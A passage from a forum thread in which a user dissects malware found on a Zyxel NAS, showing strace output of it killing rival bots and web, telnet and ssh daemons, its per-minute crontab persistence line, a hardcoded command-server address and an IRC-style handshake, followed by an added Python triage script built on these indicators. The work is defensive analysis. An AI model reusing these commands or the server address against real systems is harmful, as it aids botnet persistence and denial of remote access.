Mar  8 18:57:46 ks10 kernel: [  383.871992] process '/home/test/tty6' started with executable stack
I *think* it decompresses/decrypts itself to its stack and executes from there. Then it forks a lot, and it tries to isolate the box by stopping http servers, telnet and ssh daemons:
# grep exec strace.*
strace.1032:execve("./tty6", ["./tty6"], 0xbef8b770 /* 19 vars */) = 0
strace.1032:open("/tmp/toexec", O_RDONLY)           = -1 ENOENT (No such file or directory)
strace.1038:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/wgsh > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1039:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/wgsh"], 0x48467c /* 19 vars */) = 0
strace.1040:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/bbsh > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1041:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/bbsh"], 0x50467c /* 19 vars */) = 0
strace.1042:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty0 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1043:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty0"], 0x4f467c /* 19 vars */) = 0
strace.1044:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty1 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1045:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty1"], 0x4c467c /* 19 vars */) = 0
strace.1046:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty2 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1047:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty2"], 0x4f467c /* 19 vars */) = 0
strace.1048:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty3 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1049:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty3"], 0x47467c /* 19 vars */) = 0
strace.1050:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty4 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1051:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty4"], 0x4a467c /* 19 vars */) = 0
strace.1052:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/tty5 > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1053:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/tty5"], 0x49467c /* 19 vars */) = 0
strace.1054:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty0 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1055:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty0"], 0x44467c /* 19 vars */) = 0
strace.1056:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty1 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1057:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty1"], 0x49467c /* 19 vars */) = 0
strace.1058:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty2 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1059:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty2"], 0x46467c /* 19 vars */) = 0
strace.1060:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty3 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1061:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty3"], 0x4b467c /* 19 vars */) = 0
strace.1062:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty4 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1063:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty4"], 0x44467c /* 19 vars */) = 0
strace.1064:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/tty5 > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1065:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/tty5"], 0x46467c /* 19 vars */) = 0
strace.1066:execve("/bin/sh", ["sh", "-c", "rm -rf /var/run/pty > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
strace.1067:execve("/usr/bin/rm", ["rm", "-rf", "/var/run/pty"], 0x49467c /* 19 vars */) = 0
strace.1068:execve("/bin/sh", ["sh", "-c", "killall -9 arm > /dev/null 2>&1 "...], 0xbee37784 /* 20 vars */) = 0
strace.1070:execve("/bin/sh", ["sh", "-c", "killall -9 mips > /dev/null 2>&1"...], 0xbee37784 /* 20 vars */) = 0
strace.1072:execve("/bin/sh", ["sh", "-c", "killall -9 mipsel > /dev/null 2>"...], 0xbee37784 /* 20 vars */) = 0
strace.1074:execve("/bin/sh", ["sh", "-c", "killall -9 powerpc > /dev/null 2"...], 0xbee37784 /* 20 vars */) = 0
strace.1076:execve("/bin/sh", ["sh", "-c", "killall -9 ppc > /dev/null 2>&1 "...], 0xbee37784 /* 20 vars */) = 0
strace.1078:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.armv4l.mod > /"...], 0xbee37784 /* 20 vars */) = 0
strace.1080:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.i686.mod > /de"...], 0xbee37784 /* 20 vars */) = 0
strace.1082:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mips.mod > /de"...], 0xbee37784 /* 20 vars */) = 0
strace.1084:execve("/bin/sh", ["sh", "-c", "killall -9 daemon.mipsel.mod > /"...], 0xbee37784 /* 20 vars */) = 0
strace.1086:execve("/bin/sh", ["sh", "-c", "kill -9 `cat /tmp/.xs/*.pid` > /"...], 0xbee37784 /* 20 vars */) = 0
strace.1088:execve("/bin/sh", ["sh", "-c", "rm -rf /tmp/.xs/* > /dev/null 2>"...], 0xbee37784 /* 20 vars */) = 0
strace.1089:execve("/usr/bin/cat", ["cat", "/tmp/.xs/*.pid"], 0xc2a4d4 /* 19 vars */) = 0
strace.1090:execve("/usr/bin/rm", ["rm", "-rf", "/tmp/.xs/*"], 0x46467c /* 19 vars */) = 0
strace.1091:execve("/bin/sh", ["sh", "-c", "sleep 432000 && reboot &"], 0xbee37784 /* 20 vars */) = 0
strace.1093:execve("/usr/bin/sleep", ["sleep", "432000"], 0x444604 /* 19 vars */) = 0
strace.1094:execve("/bin/sh", ["sh", "-c", "(crontab -l | grep -v \"/home/tes"...], 0xbee37784 /* 20 vars */) = 0
strace.1096:execve("/usr/bin/crontab", ["crontab", "-l"], 0x166f514 /* 19 vars */) = 0
strace.1097:execve("/usr/bin/grep", ["grep", "-v", "/home/test/tty6"], 0x166f53c /* 19 vars */) = 0
strace.1098:execve("/usr/bin/grep", ["grep", "-v", "no cron"], 0x166f534 /* 19 vars */) = 0
strace.1099:execve("/usr/bin/grep", ["grep", "-v", "lesshts/run.sh"], 0x166f564 /* 19 vars */) = 0
strace.1100:execve("/bin/sh", ["sh", "-c", "echo \"* * * * * /home/test/tty6 "...], 0xbee37784 /* 20 vars */) = 0
strace.1101:execve("/bin/sh", ["sh", "-c", "crontab /var/lock/.x001804289383"], 0xbee37784 /* 20 vars */) = 0
strace.1102:execve("/usr/bin/crontab", ["crontab", "/var/lock/.x001804289383"], 0x5145ec /* 19 vars */) = 0
strace.1103:execve("/bin/sh", ["sh", "-c", "rm -rf /var/lock/.x001804289383"], 0xbee37784 /* 20 vars */) = 0
strace.1104:execve("/usr/bin/rm", ["rm", "-rf", "/var/lock/.x001804289383"], 0x464614 /* 19 vars */) = 0
strace.1105:execve("/bin/sh", ["sh", "-c", "/bin/uname -n"], 0xbee37784 /* 20 vars */) = 0
strace.1106:execve("/bin/uname", ["/bin/uname", "-n"], 0x4545b4 /* 12 vars */) = 0
strace.1107:execve("/bin/sh", ["sh", "-c", "/bin/uname -n"], 0xbee37784 /* 20 vars */) = 0
strace.1108:execve("/bin/uname", ["/bin/uname", "-n"], 0x4b45b4 /* 12 vars */) = 0
strace.1110:execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/httpd.pid`"...], 0xbee37784 /* 20 vars */) = 0
strace.1112:execve("/bin/sh", ["sh", "-c", "service httpd stop > /dev/null 2"...], 0xbee37784 /* 20 vars */) = 0
strace.1113:execve("/usr/bin/cat", ["cat", "/var/run/httpd.pid"], 0x1a3742c /* 12 vars */) = 0
strace.1114:execve("/usr/sbin/service", ["service", "httpd", "stop"], 0x4a466c /* 12 vars */) = 0
strace.1114:execve("/usr/local/sbin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1114:execve("/usr/local/bin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1114:execve("/usr/sbin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1114:execve("/usr/bin/systemctl", ["systemctl", "stop", "httpd.service"], 0x19fa29c /* 12 vars */) = 0
strace.1115:execve("/bin/sh", ["sh", "-c", "killall -9 mini_httpd > /dev/nul"...], 0xbee37784 /* 20 vars */) = 0
strace.1117:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d461c /* 12 vars */) = 0
strace.1118:execve("/bin/sh", ["sh", "-c", "killall -9 minihttpd > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1119:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d4674 /* 12 vars */) = 0
strace.1121:execve("/bin/sh", ["sh", "-c", "kill -9 `cat /var/run/thttpd.pid"...], 0xbee37784 /* 20 vars */) = 0
strace.1124:execve("/bin/sh", ["sh", "-c", "nvram set httpd_enable=0 > /dev/"...], 0xbee37784 /* 20 vars */) = 0
strace.1125:execve("/usr/bin/cat", ["cat", "/var/run/thttpd.pid"], 0x59a42c /* 12 vars */) = 0
strace.1126:execve("/usr/bin/systemctl", ["systemctl", "list-unit-files", "--full", "--type=socket"], 0x19fa2b4 /* 12 vars */) = 0
strace.1127:execve("/usr/bin/sed", ["sed", "-ne", "s/\\.socket\\s*[a-z]*\\s*$/.socket/"...], 0x19fa29c /* 12 vars */) = 0
strace.1128:execve("/bin/sh", ["sh", "-c", "nvram set http_enable=0 > /dev/n"...], 0xbee37784 /* 20 vars */) = 0
strace.1129:execve("/bin/sh", ["sh", "-c", "killall -9 httpd > /dev/null 2>&"...], 0xbee37784 /* 20 vars */) = 0
strace.1131:execve("/bin/sh", ["sh", "-c", "service telnetd stop > /dev/null"...], 0xbee37784 /* 20 vars */) = 0
strace.1132:execve("/usr/sbin/service", ["service", "telnetd", "stop"], 0x47466c /* 12 vars */) = 0
strace.1132:execve("/usr/local/sbin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1132:execve("/usr/local/bin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1132:execve("/usr/sbin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1132:execve("/usr/bin/systemctl", ["systemctl", "stop", "telnetd.service"], 0x92a29c /* 12 vars */) = 0
strace.1133:execve("/bin/sh", ["sh", "-c", "service sshd stop > /dev/null 2>"...], 0xbee37784 /* 20 vars */) = 0
strace.1134:execve("/usr/sbin/service", ["service", "sshd", "stop"], 0x46466c /* 12 vars */) = 0
strace.1134:execve("/usr/local/sbin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1134:execve("/usr/local/bin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1134:execve("/usr/sbin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = -1 ENOENT (No such file or directory)
strace.1134:execve("/usr/bin/systemctl", ["systemctl", "stop", "sshd.service"], 0x52a29c /* 12 vars */) = 0
strace.1135:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d461c /* 12 vars */) = 0
strace.1136:execve("/bin/sh", ["sh", "-c", "killall -9 telnetd > /dev/null 2"...], 0xbee37784 /* 20 vars */) = 0
strace.1137:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x4d4674 /* 12 vars */) = 0
strace.1139:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x46461c /* 12 vars */) = 0
strace.1140:execve("/bin/sh", ["sh", "-c", "killall -9 utelnetd > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
strace.1143:execve("/usr/bin/basename", ["basename", "/usr/sbin/service"], 0x464674 /* 12 vars */) = 0
strace.1144:execve("/bin/sh", ["sh", "-c", "killall -9 dropbear > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
strace.1145:execve("/usr/bin/systemctl", ["systemctl", "list-unit-files", "--full", "--type=socket"], 0x92a2b4 /* 12 vars */) = 0
strace.1146:execve("/usr/bin/sed", ["sed", "-ne", "s/\\.socket\\s*[a-z]*\\s*$/.socket/"...], 0x92a29c /* 12 vars */) = 0
strace.1149:execve("/bin/sh", ["sh", "-c", "killall -9 sshd > /dev/null 2>&1"...], 0xbee37784 /* 20 vars */) = 0
strace.1150:execve("/usr/bin/systemctl", ["systemctl", "list-unit-files", "--full", "--type=socket"], 0x52a2b4 /* 12 vars */) = 0
strace.1151:execve("/usr/bin/sed", ["sed", "-ne", "s/\\.socket\\s*[a-z]*\\s*$/.socket/"...], 0x52a29c /* 12 vars */) = 0
strace.1153:execve("/bin/sh", ["sh", "-c", "killall -9 lighttpd > /dev/null "...], 0xbee37784 /* 20 vars */) = 0
The daemon which runs in the background identifies itself as 'inet0', 'lo', 'eth0' or '-'. Its open files:
ls -l /proc/1029/fd/
lrwx------ 1 test test 64 Mar  8 17:49 0 -> 'socket:[52991]'
lrwx------ 1 test test 64 Mar  8 17:49 1 -> /dev/null
lrwx------ 1 test test 64 Mar  8 17:49 2 -> /dev/null
lr-x------ 1 test test 64 Mar  8 17:49 3 -> /home/test/tty6
lr-x------ 1 test test 64 Mar  8 17:49 4 -> /etc/issue
lr-x------ 1 test test 64 Mar  8 17:49 5 -> /etc/issue
lr-x------ 1 test test 64 Mar  8 17:49 6 -> /proc/version
lr-x------ 1 test test 64 Mar  8 17:49 7 -> /usr/bin/crontab
lrwx------ 1 test test 64 Mar  8 17:49 8 -> 'socket:[52844]'
lr-x------ 1 test test 64 Mar  8 17:49 9 -> /usr/bin/uname
It adds a line to crontab:
$ crontab -l
* * * * * /home/test/tty6 > /dev/null 2>&1 &
I suppose it also tried /etc/inittab and other targets, but it had no rights for that.
It connects to an external server, and listens on port 63008 of local host. I think that local listener is to identify itself to the process started each minute by cron.
 netstat -tapn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      529/sshd: /usr/sbin 
tcp        0      0 127.0.0.1:63008         0.0.0.0:*               LISTEN      698/inet0           
tcp        0      0 192.168.1.188:50294     66.178.182.1:8080       ESTABLISHED 698/inet0           
tcp6       0      0 :::22                   :::*                    LISTEN      529/sshd: /usr/sbin
Intercepted some traffic:
9:58:04.972842 IP (tos 0x0, ttl 64, id 188, offset 0, flags [DF], proto TCP (6), length 60)
    192.168.1.188.60104 > www.khust.tv.http-alt: Flags [S], cksum 0x02ce (incorrect -> 0x6e2f), seq 1494829240, win 64240, options [mss 1460,sackOK,TS val 1874051172 ecr 0,nop,wscale 5], length 0
E..<..@.@.7a......}&....Y.H....................
o..d........
19:58:05.019731 IP (tos 0x0, ttl 57, id 23970, offset 0, flags [DF], proto TCP (6), length 60)
    www.khust.tv.http-alt > 192.168.1.188.60104: Flags [S.], cksum 0x53f8 (correct), seq 2006717535, ack 1494829241, win 8192, options [mss 1452,nop,wscale 3,sackOK,TS val 3632435362 ecr 1874051172], length 0
E..<].@.9..z..}&........w.._Y.H... .S..............
....o..d
19:58:05.019862 IP (tos 0x0, ttl 64, id 189, offset 0, flags [DF], proto TCP (6), length 52)
    192.168.1.188.60104 > www.khust.tv.http-alt: Flags [.], cksum 0x02c6 (incorrect -> 0x9ab1), ack 1, win 2008, options [nop,nop,TS val 1874051219 ecr 3632435362], length 0
E..4..@.@.7h......}&....Y.H.w..`...........
o.......
19:58:05.973174 IP (tos 0x0, ttl 64, id 190, offset 0, flags [DF], proto TCP (6), length 112)
    192.168.1.188.60104 > www.khust.tv.http-alt: Flags [P.], cksum 0x0302 (incorrect -> 0xddf7), seq 1:61, ack 1, win 2008, options [nop,nop,TS val 1874052172 ecr 3632435362], length 60: HTTP
E..p..@.@.7+......}&....Y.H.w..`...........
o..L....NICK A6|f|1|623134|ks10
USER x00 localhost localhost :2021r

19:58:06.119665 IP (tos 0x0, ttl 57, id 24082, offset 0, flags [DF], proto TCP (6), length 52)
    www.khust.tv.http-alt > 192.168.1.188.60104: Flags [.], cksum 0x9650 (correct), ack 61, win 1016, options [nop,nop,TS val 3632436462 ecr 1874052172], length 0
E..4^.@.9.....}&........w..`Y.H......P.....
....o..L
19:58:06.433765 IP (tos 0x0, ttl 57, id 24110, offset 0, flags [DF], proto TCP (6), length 163)
    www.khust.tv.http-alt > 192.168.1.188.60104: Flags [P.], cksum 0xf870 (correct), seq 1:112, ack 61, win 1024, options [nop,nop,TS val 3632436775 ecr 1874052172], length 111: HTTP
E...^.@.9.....}&........w..`Y.H......p.....
...'o..L:IRC!IRC@0x.25 PRIVMSG A6|f|1|623134|ks10 :.VERSION.
:. 010 . 127.0.0.1 6667 :
:. 005 . :
:. 376 . :
Not very readable.

So far I have not been able to dump the decompressed/decrypted executable.

Maybe it's a good idea to remove the download link. The file is dangerous.
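The indicators in this post (a process masquerading as a network interface name, a per-minute crontab entry running a binary from a home directory, and an IRC-style NICK/USER handshake on a non-IRC port) can be turned into simple host triage checks. The script below is an added example, not Mijzelf's code or anything from the thread: the sample netstat, crontab and payload text is re-typed from what the post shows and embedded as constructed input so it runs offline, and the function names and heuristics are my own.

```python
"""Triage checks for the indicators described in the post above.

Added example: none of this is the thread's own code. The sample netstat,
crontab and payload text is re-typed from what the post shows and embedded
as constructed input so the script runs offline; the function names and
the heuristics are my own.
"""
import re

# Process names the post says the daemon uses to masquerade as a network interface.
INTERFACE_LIKE_NAMES = {"inet0", "lo", "eth0", "-"}

# Ports on which an IRC handshake is expected; IRC traffic elsewhere is worth a look.
IRC_PORTS = {6667, 6697}

# Directories from which a cron job should not normally run an executable.
DROP_DIRS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# One `netstat -tapn` row: proto, queues, local, remote, optional state, pid/program.
NETSTAT_LINE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)\s+"
    r"(?P<state>[A-Z_]+)?\s*(?P<pid>\d+|-)/(?P<prog>\S+)"
)

# Five-field crontab schedule followed by the command.
CRON_LINE = re.compile(r"^((?:\S+\s+){4}\S+)\s+(.+)$")


def flag_netstat(text):
    """Return rows of `netstat -tapn` output whose program name mimics an interface."""
    findings = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line.strip())
        if not m:
            continue
        prog = m.group("prog").rstrip(":")  # "sshd:" -> "sshd"
        if prog in INTERFACE_LIKE_NAMES:
            findings.append({
                "pid": m.group("pid"),
                "prog": prog,
                "local": f'{m.group("laddr")}:{m.group("lport")}',
                "remote": f'{m.group("raddr")}:{m.group("rport")}',
                "state": m.group("state") or "",
            })
    return findings


def suspicious_cron_entries(crontab_text):
    """Return commands scheduled every minute that run something from a drop directory."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, command = m.groups()
        every_minute = schedule.split() == ["*"] * 5
        from_drop_dir = any(tok.startswith(d) for tok in command.split() for d in DROP_DIRS)
        if every_minute and from_drop_dir:
            hits.append(command)
    return hits


def looks_like_irc(payload, remote_port):
    """True when an IRC client registration (NICK + USER) or a CTCP VERSION probe
    is seen on a port where IRC is not expected (the post shows it on 8080)."""
    registration = (re.search(r"^NICK\s+\S+", payload, re.M) is not None
                    and re.search(r"^USER\s+\S+", payload, re.M) is not None)
    # tcpdump prints the non-printable CTCP delimiter (\x01) as '.', hence the '.?'.
    ctcp_probe = re.search(r"PRIVMSG\s+\S+\s+:.?VERSION", payload) is not None
    return (registration or ctcp_probe) and remote_port not in IRC_PORTS


# Constructed sample input, re-typed from the output shown in the post.
SAMPLE_NETSTAT = """
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      529/sshd: /usr/sbin
tcp        0      0 127.0.0.1:63008         0.0.0.0:*               LISTEN      698/inet0
tcp        0      0 192.168.1.188:50294     66.178.182.1:8080       ESTABLISHED 698/inet0
tcp6       0      0 :::22                   :::*                    LISTEN      529/sshd: /usr/sbin
"""
SAMPLE_CRONTAB = "* * * * * /home/test/tty6 > /dev/null 2>&1 &\n"
SAMPLE_CLIENT_PAYLOAD = "NICK A6|f|1|623134|ks10\r\nUSER x00 localhost localhost :2021r\r\n"
SAMPLE_SERVER_PAYLOAD = ":IRC!IRC@0x.25 PRIVMSG A6|f|1|623134|ks10 :\x01VERSION\x01\r\n"

if __name__ == "__main__":
    for row in flag_netstat(SAMPLE_NETSTAT):
        print("interface-like process:", row)
    for cmd in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("per-minute cron job from drop dir:", cmd)
    print("client handshake is IRC on 8080:", looks_like_irc(SAMPLE_CLIENT_PAYLOAD, 8080))
    print("server reply is IRC on 8080:", looks_like_irc(SAMPLE_SERVER_PAYLOAD, 8080))
```

On a live box you would feed it `netstat -tapn` and `crontab -l` output for each user instead of the embedded samples; the payload check is meant for strings pulled from a capture of the flagged connection, and only fires when the handshake appears on a port other than the usual IRC ones.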
Re: Zyxel NSA325v2 brick
March 08, 2022 01:17PM
Very good investigation Mijzelf, this file came from the last fonzplug (ffp) installation on my NAS325v2. After I installed Debian on it, I removed the whole dir.
Re: Zyxel NSA325v2 brick
March 08, 2022 03:41PM
Really? How old was that installation? I'm a bit surprised that the command server apparently still works. As far as I could see there was no dns request, so the IP address is hardcoded. I wouldn't expect the command server to be longer than a few days on the same address. But who knows? The reverse dns of tcpdump says the IP address is www.khust.tv, which is Russian. A takedown might be difficult.